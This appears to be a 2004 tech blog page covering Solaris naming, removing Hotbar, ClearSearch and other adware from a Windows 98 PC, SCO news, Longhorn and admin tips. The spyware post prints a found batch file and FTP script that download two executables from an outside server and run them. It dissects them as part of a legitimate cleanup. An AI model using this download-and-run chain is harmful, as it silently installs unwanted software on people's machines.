Solaris Version Numbering

Sun's operating system versioning scheme has seemed confusing to me, since the same operating system version may be referred to with different version numbers. An explanation of Sun's numbering scheme for Solaris can be found at Sun Versus Linux: The x86 Smack-down where the following explanation can be found:

After Solaris 2.6, Sun decided to change how it named each Solaris version. The next version was Solaris 2.7, but Sun called it simply “Solaris 7”. Solaris 8 is actually 2.8, and Solaris 9 is 2.9. They are sometimes still referred to by the old nomenclature (i.e. 2.7), especially when dealing with porting and software versioning.

A bit confused? I've still got more! Solaris versions are also sometimes referred to as SunOS, and different numbering schemes apply there as well.. SunOS was the original operating system released by Sun in 1981 and is based on BSD, where Solaris is based on SVR4 Unix (System V). The last version of SunOS was 4.1.4, which would make Solaris 2.0 (Solaris started at 2.0) SunOS 5.0. So Solaris 9 is also known as Solaris 2.9 and also known as SunOS 5.9.

The article by Tony Bourke also offers a comparison of Linux and Solaris.

Another good source of information on the naming of Solaris version naming is the Wikipedia SunOS article.

[/os/unix/solaris] permanent link

Windows 98 System Hanging After Login

My mother-in-law told me her Windows 98 PC hangs after she enters her name and password to log into it. She said that even if she waits a long time, she can't get any further. Rebooting the system puts it back in the same state.

When I tested the system, I found I could bring up the Windows Explorer with Ctrl-Alt-Del, which showed the following tasks.

Explorer
Starter
Systray
Scanregw

I ended the Scanregw task, but that didn't help and then I couldn't even bring up the task list again. I rebooted and logged in with my wife's userid and password. When I brought up the task list, again I saw the same tasks, but this time I saw "Not responding" listed after Explorer. I ended the Windows Explorer task and then the system appeared to perform normally. However, when I opened Windows Explorer, I saw "Finalizing installation" continually scrolling across Windows Explorer directly beneath the address bar.

The antivirus program wasn't shown in the system tray. When I went looking for the program with the Windows Explorer, I saw a Hotbar folder under the Program Files folder. I've encountered problems with this adware/spyware program on other systems and would not leave it on any PC I support.

The company that produces this adware/spyware claims "Hotbar enhances and personalizes your Internet & email applications" and can "make your emails unique with hundreds of animations, backgrounds and more" and allows you to "design & send FREE eCards from your existing email". They also state that Hotbar will "brighten your browser with colorful images & enhance your surfing experience with Smart Buttons!" But their "free" software comes with an unseen price tag. This software is likely to significantly impair the performance and stability of your system.

If you click on the Terms of Use and License link you will find the following:

HOTBAR COLLECTS AND STORES INFORMATION ABOUT THE WEB PAGES YOU VIEW AND THE DATA YOU ENTER IN SEARCH ENGINE SEARCH FIELDS WHILE USING THE SOFTWARE. HOTBAR USES THIS INFORMATION TO DETERMINE WHICH ADS AND BUTTONS TO DISPLAY ON YOUR HOTBAR TOOLBARS AND WHICH ADS TO SHOW YOUR BROWSER.

So you are subjecting yourself to "targeted" popup ads, if you install the software.

Hotbar.com states that you can use Windows control panel Add/Remove Programs option to rid yourself of this software by opting to remove Outlook Tools by Hotbar, Web Browser Tools by Hotbar, and Shopper Reports Adapter. Or you can download an uninstaller from the company's website at http://hotbar.com/downloads/HbUninst.exe. Instructions on how to manually remove the software can be found at http://www.kephyr.com/spywarescanner/library/hotbar/index.phtml. I usually rely on Spybot Search & Destroy to rid systems of adware and spyware. Spybot is a free adware/spyware detection and removal program, though you should make a donation to the developer to ensure he can continue to maintain and developer such a worthwhile program.

I also use Bazooka Adware and Spyware Scanner from Kephyr to locate adware/spyware on systems. It is also free, but you really should consider making a donation to help the developer continue his work. Bazooka Adware and Spyware Scanner does an excellent job detecting such software, but can't automatically remove such software. However, the developer does provide instructions on manually removing such software. I've found that Spybot and other adware/spyware removal tools, though they disable and remove most of the bits and pieces of adware/spyware they detect, sometimes will still leave a few files, registry entries, etc. that Bazooka will detect. I can then use the manual removal instructions on the Kephyr website to remove the last remnants of the programs.

I started a Spybot Search & Destroy scan of the system. Spybot found the following adware/spyware.

ClearSearch.Net
Comet Cursors
DSO Exploit
Hotbar
Lycos.SideSearch
Test - Browser Helper Object (BHO)
VX2/e
VX2/f
VX2/h.ABetterInternet

Interestingly, the PestPatrol webpage on ClearSearch reports that "Every time the computer is started, ClearSearch will remove the search-hijacking part of Xupiter, HuntBar/MSLink, CommonName, NewDotNet, the iWon toolbar/search assistant and Netword." So apparently the software will eliminate portions of competing adware/spyware.

I had Spybot remove all of the adware/spyware it found. Spybot couldn't remove all of it immediately, so I rebooted it to let it remove the rest of it at startup. However, the system hung again after Spybot competed its work. I used Ctrl-Alt-Del again and saw a list similar to what I had seen previously.

Explorer
Systray
Scanregw
Rundll32
Starter

I chose to shut down the system, but the system didn't shut down and I couldn't bring up the task list with Ctrl-Alt-Del again. I had to power the system off and on. When I logged in again, I didn't experience the problem with the system hanging. But when I ran Spybot again to make sure that it wasn't seeing any adware/spyware, it reported two registry keys still existed for Hotbar. I had it "fix selected problems" again and then repeated the scan. This time it reported "no immediate threats were found".

As an added precaution, I installed Ad-aware 6.0 on the system. Ad-aware is available in three versions. The standard version is free for non-commercial use. If you wish to have real-time monitoring and blocking capabilities to prevent adware/spyware being installed, purchase one of the other versions. They are relatively inexpensive given the time and aggravation they can spare you by preventing adware/spyware from being installed and subsequently causing crashes, freezes, etc. on your system.

Ad-aware reported it found 28 processes and 149 objects associated with adware/spyware on the system. It isn't unusual for a particular adware/spyware detection program to find adware/spyware that another program has missed or at least some files and registry entries associated with adware/spyware that remain even though the adware/spyware has been rendered ineffective. I've run Spybot after running Ad-aware on systems and found it has detected things that Ad-aware has missed. I usually run Ad-aware, Bazooka Adware and Spyware Scanner, and Spybot Search & Destroy on systems to ensure that no adware/spyware is left on a system. Be sure to update the programs' reference files so that you ensure you are checking for recently detected adware/spyware before you run checks on a system.

Ad-aware reported a number of tracking cookies, which I'm not as concerned about, but objects associated with the adware/spyware listed below were found as well. I'm not concerned about Ad-aware finding Alexa, since the Alexa toolbar isn't installed. Even if a system doesn't have the Alexa toolbar installed, you will likely see Alexa reported by Ad-aware, since it comes bundled with Internet Explorer. The Adware and Under-Wear - The Definitive Guide article has further information on Alexa, as well as other adware/spyware. The article states that in 2001 a $1.9 million fine was levied against the company responsible for Alexa for violating users' privacy.

Alexa
ClearSearch
CometCursor
Coulomb Dialer
HotBar
VX2.BetterInternet
FavoriteMan
WinPup32

Ad-aware reported "Some objects could not be removed" and asked if I wanted to let Ad-aware remove them after the next reboot. The only one it reported was c:\program files\clearsearch\ie_clrsch.dll. I instructed it to remove the object after the next reboot and then rebooted the sysem. Ad-ware completed its check when the system booted and I reran the program yet again for good measure. This time the program didn't find any adware/spyware, reporting "0 New objects" were found.

There are still four items on the desktop that I believe are associated with ClearSearch, though. The file names are as follows:

o
o.bat
ClrSchP028.exe
Calsdr.exe

The batch file o.bat contained the following lines:

if not exist C:\WINDOWSstatuslog ftp -s:o
if exist ClrSchP028.exe ClrSchP028.exe
if exist calsdr.exe calsdr.exe

The first line checks to see if the file WINDOWSstatuslog exists in C:\. If the file doesn't exist, the File Transfer Protocol (FTP) program that comes with windows is started. The "-s" specifies that a script should be executed (you can see other options by typing " ftp -h" at a command prompt). The script is a text file with the name of the file following the colon. In this case the name of the file is "o". After the first line is executed, the batch file will check to see if ClrSchP028.exe and calsdr.exe exist and will execute them if they exist. By checking for their existence first, the batch file avoids the display of an error message by your system.

Looking at the contents of the file titled "o", I see the following:

open downloads.default-homepage-network.com
tmpacct
12345
bin
get ClrSchP028.exe
get calsdr.exe
bye

The first line tells the ftp program to open a connection to the system downloads.default-homepage-network.com. An FTP server will prompt for a userid and password. So the second line transmits a userid of "tmpacct" and the following line transmits the password "12345". On the next line, the "bin" command sets the file transmitssion mode to use binary rather than text transmissions. That command is needed to ensure that there is no attempt to translate end of line markers in files transmitted. The next two "get" commands instruct the FTP server to transmit the two programs, ClrSchP028.exe and calsdr.exe. The last line terminates the connection to the FTP server.

So, if the two files were received from the FTP server they will be executed by the o.bat batch file. Looking at the ClrSchP028.exe file with FileAlyzer, a tool available from the developer of Spybot Search & Destroy, which will allow one to analyze the contents of files, I see there is a company name, Clear Search, listed in the file (see Figure 1). Using FileAlyzer's hex dump capability, I looked for text in the file. I see the program will attempt to contact sds.clrsch.com for updates (see Figure 2).

I deleted the four ClearSearch files from the desktop by right-clicking on them and choosing "delete".

If you have a question about whether a program is spyware you can go to Spychecker and enter the name of the program in its search field. The site also has links to a number of anti-spyware tools. You can also check on a file using Kephyr's searchable database.

I updated the Norton Antivirus 2000 virus definitions and checked the system with that program as well. It found a Trojan on the system, which it quarantined.

Name	Virus
do.exe	Download.Trojan

While I was checking the folders under C:\Program Files, I noticed a there was a C:\Program Files\ClearSearch folder still on the system. The only file in it, IE_ClrSch.DLL, is a 78 KB file dated 3/22/04 8:13 PM. When I tried to remove the file, I received a message that "the specified file is being used by Windows." I ran another Ad-aware scan, which found ClearSearch again. It reported the following for ClearSearch:

Vendor

Type

Category

Object

ClearSearch

Regkey

Data Miner

HKEY_LOCAL_MACHINE:SOFTWARE\CLRSCH

ClearSearch

RegValue

Data Miner

HKEY_CURRENT_USER:Software\Microsoft\Internet Explorer\URLSearchHooks\

ClearSearch

Folder

Data Miner

c:\program files\ClearSearch\

ClearSearch

File

Data Miner

c:\program files\clearsearch\ie_clrsch.dll

When I requested Ad-aware remove the adware/spyware it found, it reported the following:

Some objects could not be removed.
Try closing all open browser windows prior to the removal
If this does not help, reboot and run Ad-aware again.

C:\program
files\clearsearch\ie_clrsch.dll

I had two Internet Explorer windows open while I was running Ad-aware, which might have led to the message. When I rebooted and Ad-aware ran again, it reported it didn't detect any more adware/spyware after it ran. But the ClearSearch folder and ie_clrsch.dll file were still on the system.

I finally resorted to the manual removal instructions at http://www.kephyr.com/spywarescanner/library/clearsearch.bho1/index.phtml . I rebooted the system and hit F8 as it rebooted to obtain the Microsoft Windows 98 Startup Menu. I then chose Safe Mode. I then took the following steps:

1. Click on Start and select Run
2. Type regedit and hit enter
3. Look for the key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000240} and delete it, if found, by clicking on it to select it and then clicking on Edit followed by Delete.
. When you click on it, you will see "IEHooks Class" in the right pane under "Data".
4. Delete the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00000000-0000-0000-0000-000000000240}, if it exists. You will see "Clear Search" under the "Data" column in the right-hand pane of the Registry Editor window when you select this key.
5. Click on "Registry", then "Exit" to exit the registry editor.
6. Delete the ClearSearch folder under the Program Files folder
7. Restart the computer in normal mode
8. Start Internet Explorer, click on Tools, Internet Options, Programs, and then click on the "Reset Web Settings button. When asked if you want to reset your Web settings to their original Internet Explorer defaults, click on "Yes".

References:

Alexa

1. SimplytheBest Spyware Information

ClearSearch

2. PestPatrol
3. Clearsearch Uninstall
4. Symantec

CometCursor

5. and.doxdesk.com
6. Kephyr

Coulomb Dialer

7. Kephyr

FavoriteMan

8. and.doxdesk.com

HotBar

9. 'Hotbar' spyware program bedevils Windows and should be removed
   By Al Fasoldt
   July 20, 2003
10. and.doxdesk.com
11. Kephyr

VX2

12. PC Sympathy
13. PestPatrol

Winpup32

14. Kephyr

[/security/spyware] permanent link

SCO Threatens Energy Department

Continuing its campaign of Fear Uncertainty and Doubt (FUD) hoping to cow Linux users in to handing over large sums of money based on its unsubstantiated claims to own code used in the Linux operating system, the SCO Group, is now demanding money from the US Energy Department.

SCO apparently adheres to the motto, "if you can't innovate, litigate." The company has seen the handwriting on the wall and knows its days are numbered, but apparently believes this last desparate ploy may put off its doom a few more years. They apparently hope that they can generate enough revenue from easily cowed companies, those that may have so much spare cash that they won't mind forking over a few thousand or even a few million "just in case", and perhaps even the federal government to keep the company running, since their revenue from their version of the Unix operating system is likely to continue to decline.

References:

SCO threatens to sue Energy labs
By Michael Hardy
March 23, 2004

[/os/unix/sco] permanent link

Longhorn

I saw an estimate today for the hardware requirements for Microsoft's next major operating system (OS) release, currently dubbed Longhorn. The author of the article said that some are speculating the new OS may require a 5 GHz processor and 2 Gigabytes (GB) of memory¹. I also read another article today that stated Intel has just released its Prescott chip, which may operate at speeds as fast as 5 GHz with twice the cache of the present Pentium 4 processors². Though another article I've read states that Prescott will come in speeds up to 3.4 GHz³, so 5 GHz processor speeds are probably at least a year away yet.

The Longhorn operating system is slated for release in 2006. Microsoft may release another operating system, Windows XP Reloaded, before Longhorn is released. Windows XP Reloaded may contain some of the security and multimedia features of Longhorn. Microsoft is expected to release Service Pack 2 for Windows XP and Service Pack 1 for Windows Server 2003 by the middle of 2004.

Some of Longhorn's new security features will likely require hardware upgrades, which is good news for hardware manufacturers. The OS will rely on a built-in security chip to supply some of the security functionality.

References:

1. Desktop giant
   Next version of Windows expected to have big hardware needs
   By Florence Olsen

March 22, 2004
2. Intel quietly unleashes the power of Prescott
   By Oliver Rist
   March 19, 2004
3. Prescott Brings More Cache to Intel's Future
   By Konstantinos Karagiannis
   February 4, 2004

[/os/windows/longhorn] permanent link

NetSky Worm

According to the article " NetSky variants spark search for code" at ZDNet, the author of the NetSky worm may have released the source code to the worm.

References:

1. NetSky variants spark search for code
2. Second NetSky worm on the loose

[/security/worms] permanent link

Locking Computer

If you wish to lock your Windows NT, 2000, or XP system when you are going to leave it so that no one else can view what was on your screen when you left or use the system, you can hit the Ctrl, Alt, and Del keys simultaneously to do so. Hitting Ctrl-Alt-Del should bring up a window where you will see a button to "Lock Computer". However, if you are using a Windows XP system with Fast User Switching enabled, which is the default setting for a Windows XP system that is not part of a domain, hitting those three keys simultaneously will bring up the Windows Task Manager instead. But you can still lock the system by hitting the "Windows" and "L" keys simultaneously. The "Windows" key on most newer keyboards used on Windows systems will be located in the bottom row of the keyboard between the Ctrl and Alt keys on the left side of the keyboard. It will have Microsoft's flying Window symbol on it.

If you wish to disable Fast User Switching, see " How can I disable Fast User Switching in Windows XP Pro?"

[/os/windows] permanent link

Updating a File's Timestamp with Touch

You can use the Unix touch command to modify a file's timestamp. The syntax is touch -t STAMP where the timestamp is in the form

[[CC]YY]MMDDhhmm[.ss]

CC - century, e.g. 19 for twentieth century or 20 for twenty first century
YY - year
MM - month, use 01 for January
DD - day, use leading zeroes, e.g. 01 for the first day of the month
hh - hours in 24 hour format, e.g. 13 is 1:00 P.M.
mm - minutes
ss - seconds

Note: brackets denote optional parameters.

E.g. touch -t 200402132233 myfile.txt resets the timestamp on myfile.txt to February 13, 2004 10:33 P.M.

[/os/unix/commands] permanent link

Configuring Telnet Server Service on Windows Small Business Server 2003

Starting the Telnet Service

1. Click on Start
2. Select Administrative Tools
3. Select Services
4. Scroll down until you find the Telnet service
5. Double-click on Telnet
6. Change the startup type to Automatic
7. Click on Apply
8. Double-click on Start
9. Click on OK
10. Close the Services window by selecting File then Exit

Configuring the Telnet Service for NT Authentication

Normally the telnet service will allow transmission of passwords in plaintext, i.e. in unencrypted format. Someone with a sniffer can learn the userid and password if unencrypted passwords are allowed. So ensure that only NT authentication is used, which will prevent plaintext passwords from being used to make the connection.

1. Click on Start
2. Select All Programs
3. Select Accessories
4. Select Command Prompt
5. Type tlntadmn config sec=-passwd and hit the Enter key. You should see "The settings were successfully updated."
6. You can check the settings by typing tlntadm. For "authentication mechanism" you should see only NTLM

Note: If you wish to see other options for the tlntadm command you can type tlntadm /?

Specifying Telnet Clients

Under Windows Small Business Server 2003, you must also stipulate which userids are allowed to make Telnet connections to the server. To do so, take the steps below.

1. Click on Start
2. Select All Programs
3. Select Administrative Tools
4. Select Active Directory Users and Computers
5. In the right pane, double-click on Telnet Clients
6. Click on the Members tab
7. Click on Add
8. Under Enter the object names to select, put in the userids for which you wish to allow access
9. You can click on Check Names to check the validity of names you have entered
10. Click on OK when finished
11. Click on OK again at the TelnetClients Properties window
12. Click on File then Exit at the Active Directory Users and Computers window

References:

1. Description of the Telnet Server Service Administration Tool

[/os/windows/server2003] permanent link